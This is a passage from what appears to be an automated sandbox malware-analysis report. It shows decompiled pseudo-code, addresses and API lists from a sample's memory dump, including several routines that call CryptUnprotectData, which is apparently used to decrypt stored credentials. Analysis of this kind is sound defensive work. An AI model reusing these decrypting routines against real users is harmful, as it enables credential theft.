										 *(__edi[7] + 8) =  *(__edi[7] + 8) + (( *( *__edi) & 0x000000ff) << 0x10);
										__ebx = 0;
										 *__edi =  *__edi + 1;
										 *(__edi[7]) = 0xa;
										goto L27;
									}
									goto L50;
								case 0xa:
									L27:
									__eax = __edi[1];
									if(__eax == 0) {
										goto L36;
									} else {
										__ecx =  *__edi;
										__edi[2] = __edi[2] + 1;
										__edi[1] = __eax;
										__eax = __edi[7];
										 *(__edi[7] + 8) =  *(__edi[7] + 8) + (( *( *__edi) & 0x000000ff) << 8);
										__eax = __edi[7];
										__ebx = 0;
										 *__edi =  *__edi + 1;
										 *(__edi[7]) = 0xb;
										goto L29;
									}
									goto L50;
								case 0xb:
									L29:
									__eax = __edi[1];
									if(__eax == 0) {
										L36:
										return _t159;
									} else {
										__ecx =  *__edi;
										__edi[2] = __edi[2] + 1;
										__edi[1] = __eax;
										__eax = __edi[7];
										 *(__edi[7] + 8) =  *(__edi[7] + 8) + ( *( *__edi) & 0x000000ff);
										__eax = __edi[7];
										 *__edi =  *__edi + 1;
										__ecx =  *(__eax + 4);
										__ebx = 0;
										if( *(__eax + 4) ==  *((intOrPtr*)(__eax + 8))) {
											__ecx = __edi[7];
											 *(__edi[7]) = 0xc;
											goto L48;
										} else {
											 *__eax = 0xd;
											__edi[6] = "incorrect data check";
											L32:
											_t187[7][1] = 5;
											goto L33;
										}
									}
									goto L50;
								case 0xc:
									L48:
									__eax = 1;
									_pop(__edi);
									_pop(__esi);
									_pop(__ebx);
									return 1;
									goto L50;
								case 0xd:
									_pop(__edi);
									_pop(__esi);
									__eax = 0xfffffffd;
									_pop(__ebx);
									return 0xfffffffd;
									goto L50;
							}
							L33:
							_t122 =  *(_t187[7]);
						}
					}
					goto L34;
				}
				L50:
			}








                                        0x29d8c0e7
                                        0x29d8c0eb
                                        0x29d8c32b
                                        0x29d8c336
                                        0x29d8c0f1
                                        0x29d8c0f1
                                        0x29d8c0f6
                                        0x29d8c105
                                        0x29d8c107
                                        0x29d8c10f
                                        0x29d8c115
                                        0x00000000
                                        0x29d8c11c
                                        0x29d8c121
                                        0x00000000
                                        0x29d8c127
                                        0x29d8c127
                                        0x29d8c12e
                                        0x29d8c133
                                        0x29d8c136
                                        0x29d8c139
                                        0x29d8c13d
                                        0x29d8c141
                                        0x29d8c162
                                        0x29d8c171
                                        0x29d8c185
                                        0x00000000
                                        0x29d8c173
                                        0x29d8c173
                                        0x29d8c179
                                        0x00000000
                                        0x29d8c179
                                        0x29d8c143
                                        0x29d8c146
                                        0x29d8c14f
                                        0x29d8c156
                                        0x00000000
                                        0x29d8c156
                                        0x29d8c141
                                        0x00000000
                                        0x00000000
                                        0x29d8c18b
                                        0x29d8c18b
                                        0x29d8c190
                                        0x00000000
                                        0x29d8c196
                                        0x29d8c196
                                        0x29d8c199
                                        0x29d8c19d
                                        0x29d8c1a0
                                        0x29d8c1a2
                                        0x29d8c1a6
                                        0x29d8c1b0
                                        0x29d8c1bc
                                        0x29d8c1c0
                                        0x29d8c1d8
                                        0x29d8c345
                                        0x00000000
                                        0x29d8c1de
                                        0x29d8c1de
                                        0x00000000
                                        0x29d8c1de
                                        0x29d8c1c2
                                        0x29d8c1c2
                                        0x29d8c1c8
                                        0x00000000
                                        0x29d8c1c8
                                        0x29d8c1c0
                                        0x00000000
                                        0x00000000
                                        0x29d8c34b
                                        0x29d8c34b
                                        0x29d8c350
                                        0x00000000
                                        0x29d8c352
                                        0x29d8c354
                                        0x29d8c35b
                                        0x29d8c364
                                        0x29d8c36a
                                        0x29d8c36c
                                        0x29d8c36e
                                        0x00000000
                                        0x29d8c36e
                                        0x00000000
                                        0x00000000
                                        0x29d8c374
                                        0x29d8c374
                                        0x29d8c379
                                        0x00000000
                                        0x29d8c37b
                                        0x29d8c37d
                                        0x29d8c381
                                        0x29d8c38d
                                        0x29d8c393
                                        0x29d8c395
                                        0x29d8c397
                                        0x00000000
                                        0x29d8c397
                                        0x00000000
                                        0x00000000
                                        0x29d8c39d
                                        0x29d8c39d
                                        0x29d8c3a2
                                        0x00000000
                                        0x29d8c3a4
                                        0x29d8c3a6
                                        0x29d8c3aa
                                        0x29d8c3b6
                                        0x29d8c3bc
                                        0x29d8c3be
                                        0x29d8c3c0
                                        0x00000000
                                        0x29d8c3c0
                                        0x00000000
                                        0x00000000
                                        0x29d8c3c6
                                        0x29d8c3c6
                                        0x29d8c3cb
                                        0x00000000
                                        0x29d8c3d1
                                        0x29d8c3d3
                                        0x29d8c3d7
                                        0x29d8c3e0
                                        0x29d8c3e3
                                        0x29d8c3e6
                                        0x29d8c3eb
                                        0x29d8c3ee
                                        0x29d8c3ff
                                        0x29d8c3ff
                                        0x00000000
                                        0x00000000
                                        0x29d8c403
                                        0x29d8c409
                                        0x29d8c40c
                                        0x29d8c413
                                        0x29d8c41a
                                        0x29d8c41f
                                        0x29d8c420
                                        0x29d8c421
                                        0x29d8c425
                                        0x00000000
                                        0x00000000
                                        0x29d8c1e9
                                        0x29d8c1ec
                                        0x29d8c1f0
                                        0x29d8c1f7
                                        0x29d8c1ff
                                        0x29d8c21b
                                        0x29d8c337
                                        0x00000000
                                        0x29d8c221
                                        0x29d8c224
                                        0x00000000
                                        0x29d8c22a
                                        0x29d8c22a
                                        0x29d8c22d
                                        0x29d8c230
                                        0x29d8c233
                                        0x29d8c235
                                        0x29d8c23a
                                        0x29d8c240
                                        0x29d8c24d
                                        0x00000000
                                        0x29d8c242
                                        0x29d8c242
                                        0x00000000
                                        0x29d8c242
                                        0x29d8c240
                                        0x29d8c224
                                        0x29d8c201
                                        0x29d8c204
                                        0x29d8c20a
                                        0x29d8c20d
                                        0x00000000
                                        0x29d8c20d
                                        0x00000000
                                        0x00000000
                                        0x29d8c253
                                        0x29d8c253
                                        0x29d8c258
                                        0x00000000
                                        0x29d8c25e
                                        0x29d8c25e
                                        0x29d8c260
                                        0x29d8c264
                                        0x29d8c26a
                                        0x29d8c270
                                        0x29d8c273
                                        0x29d8c276
                                        0x29d8c278
                                        0x29d8c27a
                                        0x00000000
                                        0x29d8c27a
                                        0x00000000
                                        0x00000000
                                        0x29d8c280
                                        0x29d8c280
                                        0x29d8c285
                                        0x00000000
                                        0x29d8c28b
                                        0x29d8c28d
                                        0x29d8c291
                                        0x29d8c294
                                        0x29d8c297
                                        0x29d8c29a
                                        0x29d8c29d
                                        0x29d8c2a3
                                        0x29d8c2a5
                                        0x29d8c2a7
                                        0x00000000
                                        0x29d8c2a7
                                        0x00000000
                                        0x00000000
                                        0x29d8c2ad
                                        0x29d8c2ad
                                        0x29d8c2b2
                                        0x00000000
                                        0x29d8c2b8
                                        0x29d8c2b8
                                        0x29d8c2ba
                                        0x29d8c2be
                                        0x29d8c2c4
                                        0x29d8c2ca
                                        0x29d8c2cd
                                        0x29d8c2d0
                                        0x29d8c2d2
                                        0x29d8c2d4
                                        0x00000000
                                        0x29d8c2d4
                                        0x00000000
                                        0x00000000
                                        0x29d8c2da
                                        0x29d8c2da
                                        0x29d8c2df
                                        0x29d8c339
                                        0x29d8c341
                                        0x29d8c2e1
                                        0x29d8c2e1
                                        0x29d8c2e3
                                        0x29d8c2e7
                                        0x29d8c2ed
                                        0x29d8c2f0
                                        0x29d8c2f3
                                        0x29d8c2f6
                                        0x29d8c2f8
                                        0x29d8c2fb
                                        0x29d8c300
                                        0x29d8c426
                                        0x29d8c429
                                        0x00000000
                                        0x29d8c306
                                        0x29d8c306
                                        0x29d8c30c
                                        0x29d8c313
                                        0x29d8c316
                                        0x00000000
                                        0x29d8c316
                                        0x29d8c300
                                        0x00000000
                                        0x00000000
                                        0x29d8c42f
                                        0x29d8c42f
                                        0x29d8c434
                                        0x29d8c435
                                        0x29d8c436
                                        0x29d8c43a
                                        0x00000000
                                        0x00000000
                                        0x29d8c43b
                                        0x29d8c43c
                                        0x29d8c43d
                                        0x29d8c442
                                        0x29d8c446
                                        0x00000000
                                        0x00000000
                                        0x29d8c31d
                                        0x29d8c320
                                        0x29d8c322
                                        0x29d8c10f
                                        0x00000000
                                        0x29d8c0f6
                                        0x00000000

                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: $incorrect data check$incorrect header check$invalid window size$need dictionary$unknown compression method
                                        • API String ID: 0-563650611
                                        • Opcode ID: 5aca2d39171294c868533136438a88bb240eb84b9a0f60d2e09f2fbff0f11a72
                                        • Instruction ID: a3cbef64e97a2503c9a0c664cf61cd99561400c9f6d073e2d1cc170a39e0653e
                                        • Opcode Fuzzy Hash: 5aca2d39171294c868533136438a88bb240eb84b9a0f60d2e09f2fbff0f11a72
                                        • Instruction Fuzzy Hash: 45B114B4605A06EFD704CF69D480A21F7F4FF4A311B10866AD9198BB92D735E8A3DF90
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 29DADF46 Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE
                                        Download Yara Rule
                                        C-Code - Quality: 85%
                                        			E29DADF46(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
				intOrPtr _v0;
				void* _v804;
				intOrPtr _v808;
				intOrPtr _v812;
				intOrPtr _t6;
				intOrPtr _t11;
				intOrPtr _t12;
				intOrPtr _t13;
				long _t17;
				intOrPtr _t21;
				intOrPtr _t22;
				intOrPtr _t25;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr* _t31;
				void* _t34;

				_t27 = __esi;
				_t26 = __edi;
				_t25 = __edx;
				_t22 = __ecx;
				_t21 = __ebx;
				_t6 = __eax;
				_t34 = _t22 -  *0x29dd5664; // 0xd9555f04
				if(_t34 == 0) {
					asm("repe ret");
				}
				 *0x29dd6e08 = _t6;
				 *0x29dd6e04 = _t22;
				 *0x29dd6e00 = _t25;
				 *0x29dd6dfc = _t21;
				 *0x29dd6df8 = _t27;
				 *0x29dd6df4 = _t26;
				 *0x29dd6e20 = ss;
				 *0x29dd6e14 = cs;
				 *0x29dd6df0 = ds;
				 *0x29dd6dec = es;
				 *0x29dd6de8 = fs;
				 *0x29dd6de4 = gs;
				asm("pushfd");
				_pop( *0x29dd6e18);
				 *0x29dd6e0c =  *_t31;
				 *0x29dd6e10 = _v0;
				 *0x29dd6e1c =  &_a4;
				 *0x29dd6d58 = 0x10001;
				_t11 =  *0x29dd6e10; // 0x0
				 *0x29dd6d0c = _t11;
				 *0x29dd6d00 = 0xc0000409;
				 *0x29dd6d04 = 1;
				_t12 =  *0x29dd5664; // 0xd9555f04
				_v812 = _t12;
				_t13 =  *0x29dd5668; // 0x26aaa0fb
				_v808 = _t13;
				 *0x29dd6d50 = IsDebuggerPresent();
				_push(1);
				E29DBBF15(_t14);
				SetUnhandledExceptionFilter(0);
				_t17 = UnhandledExceptionFilter(0x29dc62b8);
				if( *0x29dd6d50 == 0) {
					_push(1);
					E29DBBF15(_t17);
				}
				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
			}



















                                        0x29dadf46
                                        0x29dadf46
                                        0x29dadf46
                                        0x29dadf46
                                        0x29dadf46
                                        0x29dadf46
                                        0x29dadf46
                                        0x29dadf4c
                                        0x29dadf4e
                                        0x29dadf4e
                                        0x29db2eaa
                                        0x29db2eaf
                                        0x29db2eb5
                                        0x29db2ebb
                                        0x29db2ec1
                                        0x29db2ec7
                                        0x29db2ecd
                                        0x29db2ed4
                                        0x29db2edb
                                        0x29db2ee2
                                        0x29db2ee9
                                        0x29db2ef0
                                        0x29db2ef7
                                        0x29db2ef8
                                        0x29db2f01
                                        0x29db2f09
                                        0x29db2f11
                                        0x29db2f1c
                                        0x29db2f26
                                        0x29db2f2b
                                        0x29db2f30
                                        0x29db2f3a
                                        0x29db2f44
                                        0x29db2f49
                                        0x29db2f4f
                                        0x29db2f54
                                        0x29db2f60
                                        0x29db2f65
                                        0x29db2f67
                                        0x29db2f6f
                                        0x29db2f7a
                                        0x29db2f87
                                        0x29db2f89
                                        0x29db2f8b
                                        0x29db2f90
                                        0x29db2fa4

                                        APIs
                                        • IsDebuggerPresent.KERNEL32 ref: 29DB2F5A
                                        • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 29DB2F6F
                                        • UnhandledExceptionFilter.KERNEL32(29DC62B8), ref: 29DB2F7A
                                        • GetCurrentProcess.KERNEL32(C0000409), ref: 29DB2F96
                                        • TerminateProcess.KERNEL32(00000000), ref: 29DB2F9D
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                        • String ID:
                                        • API String ID: 2579439406-0
                                        • Opcode ID: 360fa6de99e0221a86b5d4e2fc70bde471c3c4713d6459d7fb6b7ef713f800b8
                                        • Instruction ID: ab7da9ab5e39480e72de1bc4d26b97942ffb7a575a056bc16b9ec6666d3c71ec
                                        • Opcode Fuzzy Hash: 360fa6de99e0221a86b5d4e2fc70bde471c3c4713d6459d7fb6b7ef713f800b8
                                        • Instruction Fuzzy Hash: A621CABA804280DFC700FF68F584A453BB4BB48300F90C02AE50A8B641E7BD9985BFE5
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 29D994A0 Relevance: 7.6, APIs: 5, Instructions: 53encryptionCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 31%
                                        			E29D994A0(char __eax, intOrPtr __ecx, void* __eflags) {
				intOrPtr _v8;
				char _v12;
				intOrPtr _v16;
				char _v20;
				void* __edi;
				void* __esi;
				void* _t19;
				intOrPtr _t21;
				intOrPtr _t22;
				char _t23;
				void* _t24;

				_t23 = __eax;
				_t21 = __ecx;
				E29DB0010(E29DADFE0(_t19, __ecx, __eax, __eax), _t21, _t23);
				_v8 = _t21;
				_v12 = _t23;
				_t24 = E29DADFE0(_t19, _t21, _t23, _t23);
				_push( &_v20);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push( &_v12);
				if( *0x29dd8428() == 0) {
					return 0;
				} else {
					_t22 = _v20;
					if(_t22 != 0) {
						E29DB0010(_t24, _v16, _t22);
					}
					 *((char*)(_t22 + _t24)) = 0;
					return _t24;
				}
			}














                                        0x29d994a8
                                        0x29d994ab
                                        0x29d994b5
                                        0x29d994bb
                                        0x29d994be
                                        0x29d994c9
                                        0x29d994ce
                                        0x29d994cf
                                        0x29d994d1
                                        0x29d994d3
                                        0x29d994d5
                                        0x29d994d7
                                        0x29d994dc
                                        0x29d994e5
                                        0x29d9950f
                                        0x29d994e7
                                        0x29d994e7
                                        0x29d994ec
                                        0x29d994f4
                                        0x29d994f9
                                        0x29d994fc
                                        0x29d99507
                                        0x29d99507

                                        APIs
                                        • _malloc.LIBCMT ref: 29D994AD
                                          • Part of subcall function 29DADFE0: __FF_MSGBANNER.LIBCMT ref: 29DADFF9
                                          • Part of subcall function 29DADFE0: __NMSG_WRITE.LIBCMT ref: 29DAE000
                                          • Part of subcall function 29DADFE0: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,29D84BED,00000000), ref: 29DAE025
                                        • _memmove.LIBCMT ref: 29D994B5
                                        • _malloc.LIBCMT ref: 29D994C1
                                        • CryptUnprotectData.CRYPT32(00000000,00000000,00000000,00000000,00000000,00000000,29D99635), ref: 29D994DD
                                        • _memmove.LIBCMT ref: 29D994F4
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: _malloc_memmove$AllocateCryptDataHeapUnprotect
                                        • String ID:
                                        • API String ID: 2315474888-0
                                        • Opcode ID: f1adca8047aca54ec38fc3b723a8b64b53796ef1c321ed88ae0adfe6f9c37206
                                        • Instruction ID: 00abdb3b1c82a178fc828bb962f1fb9e1e72100217d217ad901c63aa0bd61236
                                        • Opcode Fuzzy Hash: f1adca8047aca54ec38fc3b723a8b64b53796ef1c321ed88ae0adfe6f9c37206
                                        • Instruction Fuzzy Hash: DAF0F432A111187BD710AAA99C01FEFBBACDF91520F0445AEF904D3204EA72D91293F1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 29D85010 Relevance: 7.6, APIs: 5, Instructions: 52memoryencryptionCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 20%
                                        			E29D85010(intOrPtr _a4, intOrPtr _a8) {
				short* _v8;
				int _v12;
				intOrPtr _v16;
				char _v20;
				char* _t11;
				char* _t26;

				_t11 = HeapAlloc(GetProcessHeap(), 8, 0x400);
				_push( &_v12);
				_push(1);
				_push(0);
				_t26 = _t11;
				_push(0);
				_push(0);
				_v16 = _a4 + 1;
				_push(0);
				_push( &_v20);
				_v20 = _a8 - 1;
				if( *0x29dd8428() == 0) {
					return 0x29dcd617;
				} else {
					WideCharToMultiByte(0, 0, _v8, _v12, _t26, 0x400, 0, 0);
					LocalFree(_v8);
					return _t26;
				}
			}









                                        0x29d85025
                                        0x29d85031
                                        0x29d85032
                                        0x29d85034
                                        0x29d85036
                                        0x29d8503b
                                        0x29d8503e
                                        0x29d85040
                                        0x29d85043
                                        0x29d85049
                                        0x29d8504a
                                        0x29d85055
                                        0x29d8508d
                                        0x29d85057
                                        0x29d8506d
                                        0x29d85077
                                        0x29d85083
                                        0x29d85083

                                        APIs
                                        • GetProcessHeap.KERNEL32(00000008,00000400), ref: 29D8501E
                                        • HeapAlloc.KERNEL32(00000000), ref: 29D85025
                                        • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 29D8504D
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000400,00000000,00000000), ref: 29D8506D
                                        • LocalFree.KERNEL32(?), ref: 29D85077
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                        • String ID:
                                        • API String ID: 3657800372-0
                                        • Opcode ID: 53c5286a6e5a010b4e53199736553d5c90be3116de4218368090da555787d44c
                                        • Instruction ID: b43a7aa52538c1577157d17cbe99dbf0b873ba7d17100210107aee76e3b3a462
                                        • Opcode Fuzzy Hash: 53c5286a6e5a010b4e53199736553d5c90be3116de4218368090da555787d44c
                                        • Instruction Fuzzy Hash: 72017575B80308BFEB10EA94DC4AFAE7778EB44B14F008144FB05EB2C0D6B5A9009BE0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 29DA3900 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 71timeCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 55%
                                        			E29DA3900(intOrPtr __ebx, intOrPtr __edi, intOrPtr __esi, void* __eflags, signed int __fp0) {
				intOrPtr _v8;
				char _v16;
				signed int _v20;
				struct _SYSTEMTIME _v36;
				short _v38;
				short _v42;
				short _v46;
				short _v50;
				char _v52;
				intOrPtr _v60;
				char _v80;
				struct _TIME_ZONE_INFORMATION _v260;
				signed long long _v264;
				signed int _t28;
				signed int _t29;
				void* _t36;
				intOrPtr _t42;
				intOrPtr _t54;
				signed int _t55;
				void* _t56;

				_t54 = __esi;
				_t53 = __edi;
				_t42 = __ebx;
				_t28 =  *0x29dd5664; // 0xd9555f04
				_t29 = _t28 ^ _t55;
				_v20 = _t29;
				 *[fs:0x0] =  &_v16;
				_v264 = 0;
				_v36.wYear = 0;
				_v36.wMonth = 0;
				_v36.wDay = 0;
				_v36.wMinute = 0;
				_v36.wMilliseconds = 0;
				GetSystemTime( &_v36);
				GetTimeZoneInformation( &_v260);
				_t52 =  &_v36;
				_v52 = 0;
				_v50 = 0;
				_v46 = 0;
				_v42 = 0;
				_v38 = 0;
				 *0x29dd85d0( &_v260,  &_v36,  &_v52, _t29,  *[fs:0x0], E29DC2EA8, 0xffffffff);
				asm("fild dword [ebp-0x100]");
				asm("fchs");
				_v264 = __fp0 /  *0x29dd0b48;
				 *((intOrPtr*)(_t56 - 0xf8)) = _v264;
				_t36 = E29DA4A40(__edi,  &_v80,  &_v52);
				_v8 = 0;
				E29D89930("UTC", __esi, _t36);
				if(_v60 >= 0x10) {
					_t52 = _v80;
					_push(_v80);
					E29DADF3B();
				}
				 *[fs:0x0] = _v16;
				return E29DADF46(_t54, _t42, _v20 ^ _t55, _t52, _t53, _t54);
			}























                                        0x29da3900
                                        0x29da3900
                                        0x29da3900
                                        0x29da3917
                                        0x29da391c
                                        0x29da391e
                                        0x29da3925
                                        0x29da3931
                                        0x29da393b
                                        0x29da393f
                                        0x29da3942
                                        0x29da3945
                                        0x29da3948
                                        0x29da394c
                                        0x29da3959
                                        0x29da3965
                                        0x29da3968
                                        0x29da396c
                                        0x29da396f
                                        0x29da3972
                                        0x29da3975
                                        0x29da3981
                                        0x29da3987
                                        0x29da3997
                                        0x29da3999
                                        0x29da39a5
                                        0x29da39a9
                                        0x29da39b6
                                        0x29da39bd
                                        0x29da39c9
                                        0x29da39cb
                                        0x29da39ce
                                        0x29da39cf
                                        0x29da39d4
                                        0x29da39dc
                                        0x29da39f1

                                        APIs
                                        • GetSystemTime.KERNEL32 ref: 29DA394C
                                        • GetTimeZoneInformation.KERNEL32(?), ref: 29DA3959
                                        • TzSpecificLocalTimeToSystemTime.KERNEL32(?,?,?), ref: 29DA3981
                                          • Part of subcall function 29DA4A40: std::ios_base::_Ios_base_dtor.LIBCPMT ref: 29DA4B01
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Time$System$InformationIos_base_dtorLocalSpecificZonestd::ios_base::_
                                        • String ID: UTC
                                        • API String ID: 2730280976-2754919731
                                        • Opcode ID: 2702d7f3aa886d315f984de08c9904e007333d5698fa4b0565c6024b279f8929
                                        • Instruction ID: f81519987f05dfeef689104cbbd21932b31aaf9b83b11330db3157a21351a4f2
                                        • Opcode Fuzzy Hash: 2702d7f3aa886d315f984de08c9904e007333d5698fa4b0565c6024b279f8929
                                        • Instruction Fuzzy Hash: CD214BB6D14248DBCB00DFA4D984BEEBBB8FF58700F00456EE41AE3640EB345654DB64
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 29D99210 Relevance: 6.0, APIs: 4, Instructions: 44memoryencryptionCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 68%
                                        			E29D99210(intOrPtr __eax, intOrPtr __ecx, long* __edi, void** _a4) {
				void* _v12;
				long _v16;
				intOrPtr _v20;
				char _v24;
				long _t16;
				void* _t17;
				void* _t26;

				_v20 = __eax;
				_v24 = __ecx;
				_t26 =  *0x29dd8428( &_v24, 0, 0, 0, 0, 0,  &_v16);
				if(_t26 != 0) {
					_t16 = _v16;
					 *__edi = _t16;
					_t17 = LocalAlloc(0x40, _t16);
					 *_a4 = _t17;
					if(_t17 != 0) {
						E29DB0010(_t17, _v12,  *__edi);
					}
				}
				return LocalFree(_v12) & 0xffffff00 | _t26 != 0x00000000;
			}










                                        0x29d99223
                                        0x29d9922c
                                        0x29d99235
                                        0x29d99239
                                        0x29d9923b
                                        0x29d99241
                                        0x29d99243
                                        0x29d9924c
                                        0x29d99250
                                        0x29d9925a
                                        0x29d9925f
                                        0x29d99250
                                        0x29d99275

                                        APIs
                                        • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,29DCFF18), ref: 29D9922F
                                        • LocalAlloc.KERNEL32(00000040,?), ref: 29D99243
                                        • _memmove.LIBCMT ref: 29D9925A
                                        • LocalFree.KERNEL32(?), ref: 29D99266
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Local$AllocCryptDataFreeUnprotect_memmove
                                        • String ID:
                                        • API String ID: 3008826695-0
                                        • Opcode ID: 557c432c0fcfc3eecb6347cd2861065f0312b3609b966174a717f18df1936106
                                        • Instruction ID: e7314096d0c802f2fae0092c97f6297038fbba853a235ccbbe25bd35e12001e6
                                        • Opcode Fuzzy Hash: 557c432c0fcfc3eecb6347cd2861065f0312b3609b966174a717f18df1936106
                                        • Instruction Fuzzy Hash: 4B016DB6E41319ABE700ABA4DC46FAE777CEF44B00F108158EE00AB284D774DA009BE0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 29D991B0 Relevance: 6.0, APIs: 4, Instructions: 42encryptionmemoryCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E29D991B0(DWORD* __eax, char* __ebx, void** __edi) {
				BYTE* _t5;
				int _t6;
				DWORD* _t12;
				int _t13;

				_t12 = __eax;
				 *__edi = 0;
				 *__eax = 0;
				if(CryptStringToBinaryA(__ebx, 0, 1, 0, __eax, 0, 0) == 0) {
					L4:
					return 0;
				}
				_t5 = LocalAlloc(0x40,  *_t12);
				 *__edi = _t5;
				if(_t5 == 0) {
					goto L4;
				}
				_t6 = CryptStringToBinaryA(__ebx, 0, 1, _t5, _t12, 0, 0);
				_t13 = _t6;
				if(_t13 != 0) {
					return _t6;
				} else {
					 *__edi = LocalFree( *__edi);
					return _t13;
				}
			}







                                        0x29d991b5
                                        0x29d991be
                                        0x29d991c5
                                        0x29d991d3
                                        0x29d9920c
                                        0x00000000
                                        0x29d9920c
                                        0x29d991da
                                        0x29d991e0
                                        0x29d991e4
                                        0x00000000
                                        0x00000000
                                        0x29d991f1
                                        0x29d991f7
                                        0x29d991fb
                                        0x29d9920f
                                        0x29d991fd
                                        0x29d99206
                                        0x29d9920b
                                        0x29d9920b

                                        APIs
                                        • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,-0000000F,00000000,00000000), ref: 29D991CB
                                        • LocalAlloc.KERNEL32(00000040,00000000), ref: 29D991DA
                                        • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,-0000000F,00000000,00000000), ref: 29D991F1
                                        • LocalFree.KERNEL32 ref: 29D99200
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: BinaryCryptLocalString$AllocFree
                                        • String ID:
                                        • API String ID: 4291131564-0
                                        • Opcode ID: 54c9b1a22fc7d1f94f6e82b27d4312ec63fac8f3c59d91d9e006046c7186ddec
                                        • Instruction ID: 2265a759cd92f2bd7cd02a365940045cf01343d206717094385558834542daf0
                                        • Opcode Fuzzy Hash: 54c9b1a22fc7d1f94f6e82b27d4312ec63fac8f3c59d91d9e006046c7186ddec
                                        • Instruction Fuzzy Hash: B5F03AB13903126BF7356F65AC4AF537BA9EF04BA0F200014FA44EB2C0E7B5D8409BA4
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 29DA4C40 Relevance: 4.6, APIs: 3, Instructions: 136fileCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 58%
                                        			E29DA4C40(intOrPtr* __ecx, void* __eflags, char _a4, intOrPtr _a24) {
				char _v8;
				char _v16;
				signed int _v24;
				intOrPtr _v32;
				short _v36;
				char _v52;
				intOrPtr _v60;
				short _v64;
				short _v80;
				struct _WIN32_FIND_DATAW _v672;
				void* _v676;
				char _v680;
				intOrPtr* _v684;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t52;
				signed int _t53;
				WCHAR* _t57;
				intOrPtr* _t60;
				intOrPtr* _t71;
				intOrPtr* _t84;
				intOrPtr _t85;
				intOrPtr _t89;
				intOrPtr _t98;
				void* _t103;
				void* _t105;
				intOrPtr _t109;
				intOrPtr _t113;
				signed int _t114;
				void* _t115;
				void* _t116;

				_push(0xffffffff);
				_push(E29DC2A8A);
				_push( *[fs:0x0]);
				_t116 = _t115 - 0x2a0;
				_t52 =  *0x29dd5664; // 0xd9555f04
				_t53 = _t52 ^ _t114;
				_v24 = _t53;
				_push(_t53);
				 *[fs:0x0] =  &_v16;
				_t84 = __ecx;
				_v684 = __ecx;
				_v680 = 0;
				_v8 = 1;
				_t57 = E29DA4990( &_a4, __ecx,  &_v80);
				if(_t57[0xa] >= 8) {
					_t57 =  *_t57;
				}
				_v676 = FindFirstFileW(_t57,  &_v672);
				if(_v60 >= 8) {
					_push(_v80);
					E29DADF3B();
					_t116 = _t116 + 4;
				}
				_v60 = 7;
				_v64 = 0;
				_v80 = 0;
				 *_t84 = 0;
